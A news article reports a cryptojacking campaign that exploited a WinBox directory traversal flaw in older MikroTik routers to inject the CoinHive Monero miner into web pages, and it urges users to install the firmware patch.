According to researchers, over 415,000 routers around the world have been targeted by malware that infects devices and then steals computing resources for crypto mining. According to reports, the campaign is mostly targeting MikroTik routers, and it is believed that it started at some point in August 2018.
The campaign supposedly infected around 200,000 devices in the first string of attacks. However, it did not stop there, and that number is currently doubled. Considering that MikroTik routers are among the most common ones around the world, it is possible that this number will continue to grow further.
While the latest firmware update that would be able to protect devices from the attack is already out, it is apparent that a lot of users have yet to install it. Despite the big number of infected devices, it appears that the campaign is only actively targeting this single brand. If it were to include others, experts believe that the figures would have been significantly higher.
Even without targeting other brands, the threat is expanding rapidly, although researchers noticed that the majority of infected devices is located in a single country — Brazil. However, this does not mean that the campaign is ignoring other vulnerable devices, as new ones are being detected all the time around the globe. So far, reports have found infected devices on each continent.
Attackers are after Monero
Researchers have also noted that the mining software used in the campaign is CoinHive, which is a miner dedicated to mining privacy coin Monero. While this makes sense, as Monero is often the target of hackers that use cryptojacking for making a profit, researchers were also found that the attackers employed other pieces of mining software as well.
As for the method of attack, researchers have uncovered that the attacker(s) is exploiting a directory traversal vulnerability. This flaw was found in WinBox interface of some older versions of routers created by MikroTik. These include versions up to 6.42.
The flaw was then used for injecting the Coinhive script on different web pages that users were visiting. Through this exploit, attackers were able to read arbitrary files even if unauthenticated. In the meanwhile, authenticated remote attackers managed even to write arbitrary files.
Those who believe that they might be affected by the campaign should update their routers to the latest firmware. While this is a good advice for every brand, it is especially important for those who use MikroTik routers, as these are the ones that are targeted in the attack.
As mentioned, MikroTik has already created and released a patch that will protect flawed devices from the attack. The patch can be found on MikroTik official website.